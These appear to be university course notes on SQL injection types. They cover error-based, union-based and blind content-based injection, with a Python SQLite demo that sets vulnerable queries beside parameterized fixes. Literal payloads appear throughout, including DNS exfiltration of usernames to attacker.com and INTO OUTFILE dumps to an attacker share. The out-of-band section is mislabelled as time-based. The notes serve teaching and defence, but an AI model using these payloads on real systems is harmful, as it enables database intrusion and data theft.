Notes - MCS
Analysis and Exploration of Vulnerabilities
SQLi types

In Band (Classic)

Payload is provided and the result is determined directly.

  • E.g. user is logged in, data is obtained, and tables are deleted.

In-band means that the result arrives from the same channel used to provide the payload.

As seen previously in the examples.

In Band - Error Based

Relies on the existence of an error returned by the server.

  • Detecting the existence of a SQLi only requires triggering a syntax error, e.g. with a single quote: '

Used when the service executes a query but doesn’t provide enough information for directly grabbing the data.

Detection using a single quote: http://site.com/items.php?id=2'

Or extracting data: id=2 OR CAST(NULLIF(CURRENT_USER, 'admin') AS INT)

  • If CURRENT_USER is 'admin', NULLIF returns NULL, which can be CAST to INT without error.

  • If CURRENT_USER is not 'admin', a non-NULL string is returned, and the CAST to INT triggers an error.

In Band - Union Based

Exploits the UNION operator to extract data from other tables.

Why? A query is restricted to a set of tables before the point where a payload may be injected.

SELECT Users.name,Address.street from Users,Address where
Users.address_id = Address.id and Users.name = $name

Payload for $name will use the form: UNION(SELECT * from Products)

  • Table Products will be brought into the query.

Blind (Inferential)

Inferential / Blind exploitation occurs when the injected SQL still executes, but its result is not returned to the attacker.

  • Because developers blocked debug information.

  • Because the vulnerability is a simple query.

The existence of an SQLi is determined by a change in the service behavior.

  • Without the existence of an error.

  • Without exploiting forms or logins.

Blind – Content-Based

Detected using payloads with forced Boolean results.

Standard request: http://site.com/items.php?id=2

  • Always true: http://site.com/items.php?id=2 and 1=1

  • Always false: http://site.com/items.php?id=2 and 1=2

If a system is vulnerable, the two requests will yield different results.

  • Always true: will return item 2, because id=2 and True is equivalent to id=2.

  • Always false: will return nothing, because id=2 and False is always false.
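The following is an added example, not code from the course notes: it models the Users/Address query from the Union Based section and the items.php?id=2 lookup from this section in an in-memory SQLite database, with every table, row and payload constructed for the demonstration. Each lookup is shown twice, as the vulnerable string-concatenation form and as the parameterized form, and a small differential probe runs the always-true / always-false pair from the notes to verify that a fix removes the behavioural difference.

```python
"""Added example (not from the course notes): SQLite model of union based and
content based blind SQL injection, with the parameterized fix beside each one.
All table names, rows and payloads below are constructed."""
import sqlite3


def make_db():
    """Build an in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Address  (id INTEGER PRIMARY KEY, street TEXT);
        CREATE TABLE Users    (id INTEGER PRIMARY KEY, name TEXT, address_id INTEGER);
        CREATE TABLE Products (id INTEGER PRIMARY KEY, title TEXT, price REAL);
        INSERT INTO Address  VALUES (1, 'Main St 1'), (2, 'High St 2');
        INSERT INTO Users    VALUES (1, 'alice', 1), (2, 'bob', 2);
        INSERT INTO Products VALUES (1, 'widget', 9.5), (2, 'gadget', 19.0);
    """)
    return conn


# --- Union based: the notes' Users/Address query ----------------------------

def lookup_user_vulnerable(conn, name):
    """$name is spliced into the SQL text, so a UNION inside it becomes part of
    the statement and rows from Products are appended to the result."""
    sql = ("SELECT Users.name, Address.street FROM Users, Address "
           "WHERE Users.address_id = Address.id AND Users.name = '" + name + "'")
    return conn.execute(sql).fetchall()


def lookup_user_safe(conn, name):
    """The value is bound as a parameter; the driver never parses it as SQL,
    so a payload is just a (non-existent) user name."""
    sql = ("SELECT Users.name, Address.street FROM Users, Address "
           "WHERE Users.address_id = Address.id AND Users.name = ?")
    return conn.execute(sql, (name,)).fetchall()


# --- Content based blind: the notes' items.php?id=2 lookup -------------------

def lookup_item_vulnerable(conn, item_id):
    """Numeric context, no quotes needed: 'id=2 and 1=2' rewrites the WHERE clause."""
    return conn.execute("SELECT title FROM Products WHERE id = " + item_id).fetchall()


def lookup_item_safe(conn, item_id):
    """Validate the type first, then bind; '2 and 1=1' is rejected before any SQL runs."""
    return conn.execute("SELECT title FROM Products WHERE id = ?",
                        (int(item_id),)).fetchall()


def boolean_probe_differs(lookup, conn, base_id="2"):
    """Regression check for a fix: send the always-true and always-false forms from
    the notes and report whether the service behaves differently. A vulnerable
    lookup returns item 2 for one and nothing for the other; a fixed lookup treats
    both identically (here, both are rejected with the same error)."""
    def observe(value):
        try:
            return ("ok", lookup(conn, value))
        except Exception as exc:  # the safe lookup raises ValueError on non-numeric input
            return ("error", type(exc).__name__)
    return observe(base_id + " and 1=1") != observe(base_id + " and 1=2")


if __name__ == "__main__":
    db = make_db()
    union_payload = "alice' UNION SELECT title, price FROM Products --"
    print("vulnerable:", lookup_user_vulnerable(db, union_payload))   # Products rows appear
    print("safe:      ", lookup_user_safe(db, union_payload))         # []
    print("probe on vulnerable item lookup differs:", boolean_probe_differs(lookup_item_vulnerable, db))
    print("probe on safe item lookup differs:      ", boolean_probe_differs(lookup_item_safe, db))
```

Two details worth noting when running it. The injected SELECT must produce the same number of columns as the original query (two here); with `SELECT * FROM Products`, which has three, SQLite raises an error instead, which is exactly the kind of server error the Error Based section relies on for detection. And the safe item lookup rejects the boolean probes with a type error rather than a query result, so the true and false forms become indistinguishable, which is the property the probe checks for.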

Blind – Time Based

Results in data being exfiltrated from additional channels.

  • Data, or the query status is registered in a resource available to the attacker.

DNS

SELECT LOAD_FILE(CONCAT('\\', (SELECT username FROM Users), '.attacker.com'));

  • A DNS query will be made to username.attacker.com

SMB Share

SELECT * FROM USERS INTO OUTFILE '\\host\share\out.txt'

  • A file named out.txt is written to a server controlled by the attacker.

HTTP Dir

SELECT * FROM USERS INTO OUTFILE '/var/www/out.txt'

  • File out.txt is written to a directory made available through HTTP.
